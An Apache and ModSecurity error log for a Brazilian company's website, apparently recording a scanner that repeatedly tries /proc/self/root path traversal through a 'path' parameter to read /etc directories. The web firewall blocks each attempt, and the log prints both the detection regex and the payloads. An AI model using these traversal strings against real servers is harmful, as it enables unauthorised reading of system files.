[Thu Mar 19 13:49:12.775105 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:52994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpCBkFeYa1D6dYQnAITwAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:49:17.125838 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:49:28.162181 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:48812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpGOyqAr6etmhZHNp2lQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:49:38.696005 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:58518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpIl_V7PWP6ixUYl7TxAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:49:45.133799 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38046] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:49:52.204560 2026] [mime_magic:error] [pid 31803:tid 140411632822016] (70014)End of file found: [client 57.141.18.58:44012] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:50:10.129843 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38886] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:50:13.431090 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:54868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpRfu8EFLIOrSqIpu_XAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:50:24.849809 2026] [core:alert] [pid 15826:tid 140411574073088] [client 57.141.18.105:45196] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:50:24.850090 2026] [core:alert] [pid 17887:tid 140411691570944] [client 57.141.18.55:45166] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:50:33.133879 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39710] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:50:36.163132 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:50948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpXPu8EFLIOrSqIpu_aAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:50:43.369035 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:35458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpY8df6f5d65gmYZSQrAAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:50:50.112867 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:48222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpagkwaGbbGflqUZDf8gAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:50:58.149887 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40520] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:51:03.480475 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:48230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpd_-YZRR_7pZ7nDKiegAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:09.346553 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:55536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpfQbLMZ6AikZjR9V0nAAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:13.960922 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:38802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpgcdf6f5d65gmYZSQ0gAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:18.535484 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:50040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwphta6ubjKNq_cu4ZuDgAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:20.150566 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41322] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:51:21.018416 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.228.61:49832] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwpiRkFeYa1D6dYQnAIkgAAAc0"]
[Thu Mar 19 13:51:24.715013 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:50046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpjOyqAr6etmhZHNp21gAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:35.536754 2026] [mime_magic:error] [pid 31803:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:34210] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr
[Thu Mar 19 13:51:40.132449 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.241.31:34226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpnF_V7PWP6ixUYl7UHQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:45.133804 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:51:53.760105 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.241.31:59022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpqAbLMZ6AikZjR9V0vQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:55.587282 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:37686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpq-oXxyEfFpUF8f8j6gAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:51:58.428200 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:40190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwpruyqAr6etmhZHNp28wAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:52:03.342615 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:39260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwps-oXxyEfFpUF8f8j8gAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:52:10.136301 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:52:35.145794 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:52:36.863290 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.244.43:57788] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwp1OyqAr6etmhZHNp3DwAAAFM"]
[Thu Mar 19 13:52:41.892601 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:55632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwp2da6ubjKNq_cu4ZuTAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:52:58.161778 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44736] AH01075: Error dispatching request to : (polling)
